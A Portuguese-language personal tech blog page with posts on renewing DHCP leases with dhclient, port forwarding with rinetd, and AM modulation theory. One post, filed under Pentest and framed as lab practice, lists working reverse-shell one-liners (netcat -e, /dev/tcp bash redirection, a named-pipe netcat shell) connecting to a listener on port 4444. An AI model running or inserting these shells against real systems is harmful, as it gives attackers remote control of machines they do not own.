– root@injetionsec:~#

Força DHCP (dhclient) no Linux

31.12.2014 (11:56 am) – Filed under: Linux ::

Se por ventura precisar configurar o DHCP da sua maquina as vezes usamos o dhclient mas muitas das vezes não resolve simplesmente, precisamos ‘forçar’ para obtermos o novo IP.

O dhclient fornece um meio para configurar uma ou mais interfaces de rede usando o Dynamic Host Configuration Protocol,vejamos os comandos

Linux renovar comando IP
sudo dhclient -r

Renovar ou liberar um IP no Linux para eth0
sudo dhclient -r eth0
ou
sudo dhclient -r -v eth0
sudo dhclient eth0 -v

Outras opções no Linux para renovar dhcp

ifdown eth0
ifup eth0

RHEL/CentOS/Fedora
/etc/init.d/network restart
ou
Debian/Ubuntu
/etc/init.d/networking restart

até + galera  =)

 

ferramentas – linux shell

26.12.2014 (4:23 pm) – Filed under: Pentest ::

galera segue alguns comandos que achei interessante abordar, aprendi realizando alguns testes no lab controlado que tenho por aqui, são simples mas de extrema importância.

– reverse shell

root@bt:~# nc -lvp 4444
root@bt:~# nc -vvz 192.168.40.11 4444 -e /bin/bash

OU

root@bt:~# nc -n -vv -l -p 4444
root@bt:~# /bin/bash –i >/dev/tcp/192.168.40.11/4444 0<&1 2>&1

– netcat (GAPING_SECURITY_HOLE) desabilitado

quando o GAPING_SECURITY_HOLE está desativado você não tem acesso à opção ‘-e’ do netcat pode-se fazer da seguinte forma:

root@bt:~# nc -n -vv -l -p 4444
root@bt:~# mknod file p && nc 192.168.40.11 4444 0<file | /bin/bash 1>file

– sem netcat , usando socket para conectar no host

root@bt:~# sudo /sbin/iptables -I INPUT 1 -p tcp –dport 4444 -j ACCEPT # “connetion refused” to firewall rejecting connection
root@bt:~# /bin/bash -i > /dev/tcp/192.168.40.11/4444 0<&1 2>&1 
root@bt:~# nc -n -vv -l -p 4444

– sem netcat e /dev/tcp “usando telnet”

root@bt:~# sudo /sbin/iptables -I INPUT 1 -p tcp –dport 4444 -j ACCEPT # “connetion refused” to firewall rejecting connection
root@bt:~# nc -n -vv -l -p 4444
root@bt:~# mknod file p && nc 192.168.40.11 4444 0<file | /bin/bash 1>file

até + galera 0/

 

Referência : ebook Hacking by Pankaj | netcat_infrastructure.pdf

Port forwarding com rinetd

23.12.2014 (1:30 pm) – Filed under: Redes ::

Como podemos fazer encaminhamento de porta com rinetd em distros baseada em debian, o rinetd permite encaminhar as portas de um sistema para outro, isso e útil se você mover seus sites para um novo servidor com um endereço IP diferente é você modificou seus registros DNS podemos usar o rinetd , caso ainda usam os registros de DNS antigos pode redirecioná-los para o novo servidor.

1o – instale o rinetd
apt-get install rinetd

2o – o arquivo de configuração do rinetd é /etc/rinetd.conf suponhamos que queiramos encaminhar o tráfego HTTP de 192.168.40.130 para 192.168.40.131 na porta 80 iremos add a seguinte linha

(…)
#
# bindadress bindport connectaddress connectport
192.168.40.130 80  192.168.40.131 80
# logging information
logfile /var/log/rinetd.log
# uncomment the following line if you want web-server style logfile format
# logcommon

3o – Restartamos o rinetd:
/etc/init.d/rinetd restart

4o – Executamos o netstat para ver se o rinetd esta rodando o server que configuramos
netstat -tap

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 localhost:7337 *:* LISTEN 1273/postgres
tcp 0 0 192.168.40.130:www *:* LISTEN 2485/rinetd
tcp 0 0 *:nessus *:* LISTEN 1330/nessusd

Caso você queira escutar todos os endereços IP que são configuradas no sistema onde está instalado, podemos usar 0.0.0.0 como o BindAddress da seguinte forma

(…)
#
# bindadress bindport connectaddress connectport
0.0.0.0 80  192.168.40.131 80
# logging information
logfile /var/log/rinetd.log
# uncomment the following line if you want web-server style logfile format
# logcommon

O arquivo /var/log/rinetd.log registra todos os logs definidos por tabulação simples da seguinte forma :

‣ Data e hora
‣ Endereço do cliente
‣ Host que esta na escuta
‣ Porta de escuta
‣ Transmitido host
‣ Transmitido porta
‣ Bytes recebidos pelo cliente
‣ Bytes enviados para o cliente
‣ Resultado de mensagem

Ate o próximo tópico galera =)

Modulação AM-DSB

21.12.2014 (1:38 pm) – Filed under: Telecomunicação ::

Saindo um pouco de infosec galera..kk.. estou estudando alguns assuntos para um projeto particular, a medida que tiver tempo vou postando por aqui ….

(….)

Modulação e compreendida de uma maneira genérica , onde recebe 2 saídas e temos 1 saída

001ctf

1º Entrada: sinal de informação, gerado pela fonte ou pelo transdutor sendo conhecido como sinal modulante , sinal esse que ira promover modulação

2º Entrada: sinal apropriado para transmissão pelo canal cuja a  informação é transportada sendo assim o sinal da portadora tendo alguma características modificadas pelo sinal modulante.

Saída da modulação é conhecida como sinal modulado

 

002ctf

Note no processo de modulação ao final desse processo a informação original desse sinal deixa de existir ,  e descartada pelo processo de modulação restando assim o sinal modulado (da portadora) que e efetivamente transmitido pelo canal, a classificação da modulação e de acordo com o tipo de sinal modulante (analógico e digital) e com tipo de portadora (analógico e digital) veja a tabela do processo práticos de modulação AM

003ctf

Modulação Para Facilidade De Irradiação

Uma irradiação eletromagnética eficiente necessita de antenas com dimensões físicas da ordem de meio comprimento de onda (λ /2). Muitos sinais, especialmente os sinais de áudio, possuem componentes de freqüência de baixo valor necessitando de antenas de grandes dimensões para uma irradiação direta. Utilizando a propriedade da translação em freqüênciada modulação, estes sinais podem ser sobrepostos em uma portadora de alta freqüência, conseqüente redução no tamanho da antena.

Modulação Para Redução De Ruído E Interferência

Certos tipos de modulação possuem a propriedade de reduzir efeitos causados tanto pelo ruído como pela interferência. Esta redução, entretanto, é obtida à custa de uma maior largura de faixa para a transmissão do sinal que a necessária para o sinal original.

Modulação Para Designação De Freqüência

A seleção (e separação) de uma estação, em um aparelho de rádio ou de televisão, é possível porque cada uma tem uma diferente freqüência de portadora de designação(atribuída). Duas ou mais estações transmitindo diretamente no mesmo meio, sem modulação produziriam uma superposição de sinais interferentes.

Modulação Para Multiplexação

As técnicas de multiplexação, inerentemente formas de modulação, permitem a transmissão de múltiplos sinais através de um mesmo canal, de modo que cada sinal pode ser separado no extremo de recepção.

Modulação Para Superação Delimitações De Projetos

A modulação pode ser utilizada para transladar um sinal até a porção do espectro de freqüência onde as necessidades de projeto são mais facilmente satisfeitas,temos limitações fundamentais de transmissão da informação por meios elétricos são a largura de faixa e o ruído

  • A Limitação da Largura de Faixa: obtém-se uma transmissão rápida da informação utilizando-se sinais que variam rapidamente com o tempo. Nos sistemas físicos, uma variação da energia armazenada necessita de um intervalo definido de tempo. Portanto, não se pode aumentar arbitrariamente a velocidade de transmissão, pois o sistema poderá eventualmente parar de responder às variações do sinal. Assim, existe uma taxa máxima de variação do sinal permitida pelo sistema, o que equivale a dizer que a largura de faixa de freqüências do sistema é finita e limitada
  • A Limitação pelo Ruído: a comunicação elétrica depende de quão precisamente o receptor pode determinar que sinal foi realmente enviando, distinguindo-o dos sinais que poderiam ter sido enviados. Como o ruído está sempre presente em sistemas elétricos, as perturbações do ruído sobreposto limitam a habilidade de identificar corretamente o sinal enviando, limitando, assim, a transmissão da informação, a intensidade do sinal é insuficiente, a adição de estágios de amplificação não solucionará o problema; pois o ruído será amplificado juntamente como sinal, ficando inalterada a relação sinal-ruído

Sendo a capacidade finita, pode-se afirmar que o projeto de um sistema de comunicação é um compromisso entre:

  • tempo de transmissão;
  • potência transmitida;
  • largura de faixa;
  • relação sinal-ruído;